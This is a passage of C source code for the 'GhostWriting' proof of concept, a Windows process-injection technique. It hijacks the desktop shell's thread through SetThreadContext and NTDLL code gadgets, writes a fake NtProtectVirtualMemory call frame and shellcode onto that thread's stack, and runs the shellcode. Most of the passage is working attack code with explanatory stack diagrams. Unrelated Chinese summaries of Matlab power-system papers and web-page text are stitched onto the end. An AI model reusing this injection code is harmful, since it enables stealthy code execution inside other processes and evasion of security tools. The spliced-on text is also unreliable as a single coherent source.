        // [6] We make 8th DWORD be the size that our injected executable code has
        NtProtectVirtualMemoryCallFrame[7]=NumberOfDWORDsToInject*sizeof(DWORD);


        // Here we write those 9 DWORDs into thread's stack space
        //
        //  STACK STATUS
        //  ____________________
        // |                    |<--- Stack Bottom
        // |                    |
        // |                    |
        // |                    |
        // |                    |
        // |____________________|
        // |                    |<--- ,ESP == BASEOfWrittenBytes
        // | dummy a            |   ,-| +
        // | dummy b            |   | `NumberOfBytesToPopAfterMOVBeforeRET
        // | .                  |   |
        // | .                  |   |
        // | dummy z            |   |( for i from 0 to 8 )---.
        // |____________________|   |                                                                                                      |
        // | JMPTORETAddress    |<--Ž*WriteItem ( REG2 ) == NtProtectVirtualMemoryCallFrame[i] <-|
        // |_______ | __________|    ,MOVRETOffsetFromMemoryRegister                                                                       |
        // |        |           |<---| -                                                                                                   |
        // |        |           | .  `*WritePointer ( REG1 ) == BASEOfWrittenBytes+
        //                                NumberOfBytesToPopAfterMOVBeforeRET+sizeof(DWORD)+i*4 <-Ž
        // |        |           | .                                  SOMEWHERE INTO NTDLL.DLL's CODE
        // |        |           | .                                  ________________________________________
        // |        |           |           EIP == MOVRETAddress --->|                                        |
        // |        |           |                                    |  MOV [REG1],REG2 / MOV [REG1+xx],REG2  |
        // |        |           |                                    |  ( POP REGx / ADD REGx,yy )            |
        // |        |           |                                    |  .                                     |
        // |        |           |                                    |  .                                     |
        // |        |           |                                    |  RET / RET n                           |
        // |        |           |                                    |________________________________________|
        // |        |           |
        // |        |           |
        // |        |           |                                              SOMEWHERE INTO NTDLL.DLL's CODE
        // |        |           |                                              _______________________________
        // |        `-------------------------------------------------------->|                               |
        // |                    |                                             |  JMP $                        |
        // |                    |                                             |_______________________________|
        // |                    |
        // |                    |
        // |                    |
        // |____________________|
        // |                    |<--- Initial ESP
        // |  USED STACK SPACE  |
        // |  USED STACK SPACE  |
        // |  USED STACK SPACE  |
        // |  USED STACK SPACE  |
        // |  USED STACK SPACE  |
        // |  USED STACK SPACE  |
        // |  USED STACK SPACE  |
        // |  USED STACK SPACE  |
        // |  USED STACK SPACE  |
        // |____________________|<--- Stack Top
        //
        //

        DWORDWritingPointer=BASEOfWrittenBytes+NumberOfBytesToPopAfterMOVBeforeRET+sizeof(DWORD);

        for(i=0;i<9;i++)
        {
            WorkingThreadContext.Esp=BASEOfWrittenBytes;
            *WritePointer=DWORDWritingPointer-MOVRETOffsetFromMemoryRegister;
            *WriteItem=NtProtectVirtualMemoryCallFrame[i];
            WorkingThreadContext.Eip=MOVRETAddress;

            WaitForThreadAutoLock(Thread,&WorkingThreadContext,ThreadsWindow,JMPTOSELFAddress);

            DWORDWritingPointer+=sizeof(DWORD);
        }

        // After this for executes, we have the NtProtectVirtualMemory call frame written to the hijacked
        // thread's stack:
        //
        //
        //  STACK STATUS
        //  ____________________
        // |                    |<--- Stack Bottom
        // |                    |
        // |                    |
        // |                    |
        // |                    |
        // |____________________|
        // |                    |<--- BASEOfWrittenBytes
        // | dummy a            |
        // | dummy b            |
        // | .                  |
        // | .                  |
        // | dummy z            |
        // |____________________|
        // | JMPTOSELFAddress -------------------.
        // |____________________|                |
        // | SIMULATED RETADDR  |<--- ESP        |
        // | p.1: ProcessHandle |                 |
        // | p.2: &BaseAddress -----------.         |
        // | p.3: &NumBytesProt --------. |         |
        // | p.4: NewAccessProt |       | |         |
        // | p.5: &OldAccessPrt ----.   | |         |
        // | BaseAddress --.    |<--+---+-Ž         |
        // | NumBytesProt  |    |<--+---Ž         |
        // | OldAccessPrt  |    |<--Ž             |
        // |-------------- v ---|                |
        // |                    |                |
        // |                    |                |
        // |                    |                |
        // |                    |                |                             SOMEWHERE INTO NTDLL.DLL's CODE
        // |                    |                |                             _______________________________
        // |                    |                |EIP == JMPTOSELFAddress --->/|                               |
        // |                    |                `--------------------------->/|  JMP $                        |
        // |                    |                                              |_______________________________|
        // |                    |
        // |                    |
        // |                    |
        // |____________________|
        // |                    |<--- Initial ESP
        // |  USED STACK SPACE  |
        // |  USED STACK SPACE  |
        // |  USED STACK SPACE  |
        // |  USED STACK SPACE  |
        // |  USED STACK SPACE  |
        // |  USED STACK SPACE  |
        // |  USED STACK SPACE  |
        // |  USED STACK SPACE  |
        // |____________________|<--- Stack Top
        //
        //
        // NOTE: One could say that that return address ( JMPTOSELFAddress ) is put twice and that we could
        // have optimized this by not writing it again,
        // it's true. However, I preferred to isolate this call frame from the previous stack stuff in order
        // to make it more clear and also more
        // generic.

        // Ok, so we have set up that call frame for later usage, we could run that call to
        // NtProtectVirtualMemory now, but, for the sake of clearness,
        // let's make the writings first and let the executions for the ending part. So let's write our last
        // bytes, the injection executable bytes. See
        // how DWORDWritingPointer points just ahead of the previously written call frame, so we do not need
        // to calculate it again, it actually points
        // where it needs to.

        // We save curent DWORDWritingPointer's value in order to set thread's EIP to that value later on (
        // in injection execution fase ).
        InjectedCodeExecutionStart=DWORDWritingPointer;

        // Here we write executable code bytes, DWORD by DWORD, into thread's stack space
        //
        //  STACK STATUS
        //  ____________________
        // |                    |<--- Stack Bottom
        // |                    |
        // |                    |
        // |                    |
        // |                    |
        // |____________________|
        // |                    |<--- ,ESP == BASEOfWrittenBytes
        // | dummy a            |   ,-| +
        // | dummy b            |   | `NumberOfBytesToPopAfterMOVBeforeRET
        // | .                  |   |
        // | .                  |   |
        // | dummy z            |   |  ( for i from 0 to NumberOfDWORDsToInject )---.
        // |____________________|   |                                        
        // | JMPTORETAddress    |<--Ž  *WriteItem ( REG2 ) == InjectionCode[i] <-|
        // || __________________|       ,MOVRETOffsetFromMemoryRegister
        // ||SIMULATED RETADDR  |               ,-| -
        // ||p.1: ProcessHandle |               | `*WritePointer ( REG1 ) == DWORDWritingPointer+i*4
        // ||p.2: &BaseAddress -----------.     |                      SOMEWHERE INTO NTDLL.DLL's CODE
        // ||p.3: &NumBytesProt --------. |        |                    ________________________________________
        // ||p.4: NewAccessProt |       | |   EIP == MOVRETAddress --->|                                        |
        // ||p.5: &OldAccessPrt ----.   | |                            |  MOV [REG1],REG2 / MOV [REG1+xx],REG2  |
        // ||BaseAddress --.    |<--+---+-Ž                            |  ( POP REGx / ADD REGx,yy )            |
        // ||NumBytesProt  |    |<--+---Ž       |                      |  .                                     |
        // ||OldAccessPrt  |    |<--Ž           |                      |  .                                     |
        // || ------------ v ---|               |                      |  RET / RET n                           |
        // ||                   |<--------------Ž                      |________________________________________|
        // ||                   | .
        // ||                   | .
        // ||                   | .                                           SOMEWHERE INTO NTDLL.DLL's CODE
        // ||                   |                                              _______________________________
        // |`---------------------------------------------------------------->|                               |
        // |                    |                                             |  JMP $                        |
        // |                    |                                             |_______________________________|
        // |                    |
        // |                    |
        // |                    |
        // |____________________|
        // |                    |<--- Initial ESP
        // |  USED STACK SPACE  |
        // |  USED STACK SPACE  |
        // |  USED STACK SPACE  |
        // |  USED STACK SPACE  |
        // |  USED STACK SPACE  |
        // |  USED STACK SPACE  |
        // |  USED STACK SPACE  |
        // |  USED STACK SPACE  |
        // |  USED STACK SPACE  |
        // |____________________|<--- Stack Top
        //
        //

        for(i=0;i<NumberOfDWORDsToInject;i++)
        {
            WorkingThreadContext.Esp=BASEOfWrittenBytes;
            *WritePointer=DWORDWritingPointer-MOVRETOffsetFromMemoryRegister;
            *WriteItem=InjectionCode[i];
            WorkingThreadContext.Eip=MOVRETAddress;

            WaitForThreadAutoLock(Thread,&WorkingThreadContext,ThreadsWindow,JMPTOSELFAddress);

            DWORDWritingPointer+=sizeof(DWORD);
        }

        // So, after this code injection writing loop, we have achieved this:
        //
        //
        //  STACK STATUS
        //  ____________________
        // |                    |<--- Stack Bottom
        // |                    |
        // |                    |
        // |                    |
        // |                    |
        // |____________________|
        // |                    |<--- BASEOfWrittenBytes
        // | dummy a            |
        // | dummy b            |
        // | .                  |
        // | .                  |
        // | dummy z            |
        // |____________________|
        // | JMPTOSELFAddress -------------------.
        // |____________________|                |
        // | SIMULATED RETADDR  |<--- ESP        |
        // | p.1: ProcessHandle |                 |
        // | p.2: &BaseAddress -----------.         |
        // | p.3: &NumBytesProt --------. |         |
        // | p.4: NewAccessProt |       | |         |
        // | p.5: &OldAccessPrt ----.   | |         |
        // | BaseAddress --.    |<--+---+-Ž         |
        // | NumBytesProt  |    |<--+---Ž         |
        // | OldAccessPrt  |    |<--Ž             |
        // |-------------- v ---|                |
        // | EXECUTABLE CODE    |                |
        // | EXECUTABLE CODE    |                |
        // | EXECUTABLE CODE    |                |
        // | EXECUTABLE CODE    |                |                             SOMEWHERE INTO NTDLL.DLL's CODE
        // | EXECUTABLE CODE    |                |                              _______________________________
        // | EXECUTABLE CODE    |                |EIP == JMPTOSELFAddress --->/|                               |
        // | EXECUTABLE CODE    |                `--------------------------->/|  JMP $                        |
        // | EXECUTABLE CODE    |                                              |_______________________________|
        // | EXECUTABLE CODE    |
        // | EXECUTABLE CODE    |
        // | EXECUTABLE CODE    |
        // |____________________|
        // |                    |<--- Initial ESP
        // |  USED STACK SPACE  |
        // |  USED STACK SPACE  |
        // |  USED STACK SPACE  |
        // |  USED STACK SPACE  |
        // |  USED STACK SPACE  |
        // |  USED STACK SPACE  |
        // |  USED STACK SPACE  |
        // |  USED STACK SPACE  |
        // |____________________|<--- Stack Top
        //
        //

        // Ok, all the needed stuff has been written to the hijacked stack. As we said before, first we
        // write, then we execute. All written, let's run !

        // We will first run the NtProtectVirtualMemory with our written, simulated call frame:
        // We make thread's ESP point into the callframe
        WorkingThreadContext.Esp=BASEOfWrittenBytes+NumberOfBytesToPopAfterMOVBeforeRET+sizeof(DWORD);    
        WorkingThreadContext.Eip=NtProtectVirtualMemoryAddress; // and set thread's EIP point to the address of that
                                                                // API into NTDLL.DLLs code. This two
                                                                // changes simulate the call. I hope you will
                                                                // understand it yourself this time ;)

        WaitForThreadAutoLock(Thread,&WorkingThreadContext,ThreadsWindow,JMPTOSELFAddress);

        // And finally, the moemnt we have all been waiting for.
        WorkingThreadContext.Esp=BASEOfWrittenBytes;    // set ESP to a "safe" place
        WorkingThreadContext.Esi=JMPTOSELFAddress;        // injected code expects ESI to be its "EXIT ADDRESS"
                                                        // ( see InjectionCode array declaration )
        WorkingThreadContext.Ebx=BASEOfWrittenBytes;    // injected code also expects EBX to be its "Delta Handle"
                                                        // or memory base address of its own
        WorkingThreadContext.Eip=InjectedCodeExecutionStart;    // set EIP to the base address where the
                                                                // injected executable code starts ;)

        WaitForThreadAutoLock(Thread,&WorkingThreadContext,ThreadsWindow,JMPTOSELFAddress);    // and... RUN !!!

        // alllllll donnneee ! let's let hijacked thread loose so it enjoys is silly life again ¬¬...
        SetThreadContext(Thread,&SavedThreadContext);   // restore initial thread's original state and
                                                        // restore it...
        ResumeThread(Thread);    // and resume its execution

        PostMessage(ThreadsWindow,WM_USER,0,0);    // Just in case, send a message to awake its wait...

        return TRUE;    // all went fine :D

    }
    else    // else, we did not found those two patterns :(
        return FALSE;    // so we return with error...
}


void main(void)
{
    HWND ShellWindowHandle;
    DWORD ShellWindowThread;
    HANDLE VictimThreadHandle;

    // We solve MessageBoxA APIs address...
    HMODULE USER32Base=LoadLibrary("USER32.DLL");
    DWORD MessageBoxAAddress=(DWORD)GetProcAddress(USER32Base,"MessageBoxA");
    FreeLibrary(USER32Base);

    *(DWORD*)(&InjectionCode[58])=MessageBoxAAddress;   // And we put that address into InjectionCode
                                                        // ( see InjectionCode array declaration )

    // We get our victim thread
    ShellWindowHandle=GetShellWindow();    // by first getting a handle of a window it owns
    ShellWindowThread=GetWindowThreadProcessId(ShellWindowHandle,NULL); // and then getting the owning
                                                                        // thread ID of that window

    VictimThreadHandle=OpenThread(THREAD_SET_CONTEXT|THREAD_GET_CONTEXT|THREAD_SUSPEND_RESUME,
        FALSE,ShellWindowThread);    // We open victim thread

    // And we try our injection technique over it :D
    if (Inject(VictimThreadHandle,InjectionCode,(sizeof(InjectionCode)+4)/4,ShellWindowHandle))
        MessageBox(NULL,"SUCCESS ! ;D","GhostWriting: Proof Of Concept",0);    // Yay !
    else
        MessageBox(NULL,"FAILURE ! :(","GhostWriting: Proof Of Concept",0);    // Ouch :S

    CloseHandle(VictimThreadHandle);
}
内容概要:本文提出了一种基于非合作博弈理论的居民负荷分层调度模型,并结合双层鲸鱼优化算法(Two-level Whale Optimization Algorithm)进行高效求解,模型与算法均通过Matlab代码实现。研究针对电力系统中居民侧用电负荷的复杂调度问题,引入非合作博弈机制刻画各用户之间的利益竞争关系,实现负荷的分层优化分配;同时设计双层优化架构,上层优化资源配置,下层模拟用户自主决策行为,提升了模型的实用性与合理性。通过智能优化算法求解多层级、非凸非线性的博弈模型,有效提高了调度方案的收敛性与全局寻优能力,适用于现代智能电网中的需求侧管理与能源优化场景。; 适合人群:具备电力系统基础理论知识和Matlab编程能力,从事智能电网、能源优化调度、需求侧管理、博弈论应用等方向的科研人员、高校研究生及工程技术人员。; 使用场景及目标:①应用于居民区电力负荷的分层优化调度系统设计与仿真分析;②为非合作博弈在多主体能源系统建模中的应用提供方法论支持;③利用双层鲸鱼算法解决具有嵌套结构的复杂双层优化问题,提升求解效率与调度方案的可行性。; 阅读建议:建议读者结合提供的Matlab代码深入理解模型构建逻辑与算法实现流程,重点关注博弈模型的效用函数设计、纳什均衡求解思路以及双层优化结构的迭代机制,宜配合实际用电数据开展复现实验以验证模型有效性与鲁棒性。
内容概要:本文围绕基于自适应神经模糊推理系统(ANFIS)智能控制器的可再生能源微电网功率管理系统展开研究,结合Simulink仿真实现,深入探讨了微电网中功率的智能调控与经济机组组合调度问题。通过引入ANFIS控制器,有效应对风能、光伏等可再生能源出力的波动性与不确定性,提升系统运行的稳定性与电能质量。研究内容涵盖微电网多源协调控制策略、功率平衡管理、优化调度模型构建及仿真验证,实现了对分布式电源、储能系统和负荷的协同优化,兼顾经济性与可靠性目标,并通过仿真平台验证了所提方法的有效性与优越性。; 适合人群:具备电力系统、自动化或新能源相关专业背景,熟悉Matlab/Simulink仿真环境,从事微电网能量管理、智能控制、能源优化等领域研究的研究生、科研人员及工程技术人员。; 使用场景及目标:①用于高比例可再生能源接入场景下的微电网能量管理系统研发与教学实践;②为实现微电网功率稳定控制与经济高效运行提供先进的智能控制解决方案;③支撑高水平学术论文复现、科研课题攻关及实际工程项目的仿真验证与方案优化。; 阅读建议:建议结合提供的Simulink模型与相关代码进行动手实践,重点关注ANFIS控制器的设计流程、规则库构建与参数调优方法,并通过与传统PID或MPC控制策略的对比实验,深入理解其在动态响应与鲁棒性方面的优势。同时可进一步拓展文中提出的优化调度逻辑,应用于多目标、多约束的复杂实际应用场景中。
内容概要:本文档聚焦于“直流电机双闭环控制Matlab仿真”,系统阐述了基于Matlab/Simulink平台实现直流电机双闭环控制系统(主要包括速度环与电流环)的设计与仿真全过程。通过构建直流电机的数学模型,结合PI控制器进行调控,实现对电机转速和电枢电流的高精度动态控制,验证控制策略的稳定性与响应性能。文档详细介绍了仿真模型的搭建流程、关键参数的整定方法、系统动态波形的分析手段以及仿真结果的有效性验证,体现了经典自动控制理论在实际电机系统中的工程应用,是电机控制与电力电子技术相结合的典型研究案例。; 适合人群:具备自动控制原理、电机与拖动基础、电力电子技术和Matlab/Simulink仿真能力的电气工程、自动化、机电一体化等专业的本科生、研究生及从事电机驱动系统研发的工程技术人员。; 使用场景及目标:①作为高校课程设计或实验教学材料,帮助学生深入理解双闭环调速系统的工作机理与工程实现;②服务于科研项目,为新型电机控制算法(如滑模、模糊PID等)的开发与性能对比提供基础仿真验证平台;③作为工业界产品前期设计的仿真工具,用于评估不同控制策略在动态响应、抗干扰能力和稳态精度方面的可行性。; 阅读建议:建议读者在学习过程中紧密结合自动控制理论知识,亲手在Simulink环境中搭建完整的双闭环仿真模型,通过反复调整PI控制器的比例与积分参数,观察并分析转速、电流的阶跃响应曲线,从而深刻理解反馈控制的本质、系统稳定性条件以及参数整定对动态性能的影响,进而掌握电机控制系统的设计精髓。
内容概要:本文研究了基于Benders分解与输电网运营商(TSO)和配电网运营商(DSO)协调机制的不确定环境下输配电网双层优化模型,旨在提升高比例可再生能源接入背景下电网系统的协调性与鲁棒性。模型上层以系统整体经济性为目标进行优化调度,下层采用Benders分解实现TSO与DSO之间的信息交互与协同决策,通过引入割平面迭代机制保障求解的收敛性与全局最优性。研究充分考虑新能源出力与负荷需求的不确定性,构建了具有强适应性的双层优化框架,并基于Matlab完成了模型的编程实现与仿真验证,有效解决了多主体、多层级、多不确定性因素耦合下的电力系统优化调度难题。; 适合人群:具备电力系统分析、运筹学与优化理论基础,熟悉Matlab编程环境,从事智能电网、能源互联网、分布式能源集成、电力市场等方向的研究生、科研人员及工程技术人员。; 使用场景及目标:①研究高渗透率可再生能源条件下输配电网协同优化调度策略;②掌握Benders分解在电力系统双层优化建模中的应用方法与实现技巧;③构建TSO-DSO多主体协调机制,实现跨层级电网资源的高效互动与决策解耦;④提升对不确定性建模、分解算法设计及大规模优化问题求解能力。; 阅读建议:建议读者结合Matlab代码逐模块剖析模型构建流程,重点理解Benders割的生成逻辑、主从问题的信息传递机制及收敛判据设定,推荐在标准IEEE测试系统上复现实验以深入掌握模型特性与算法性能。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值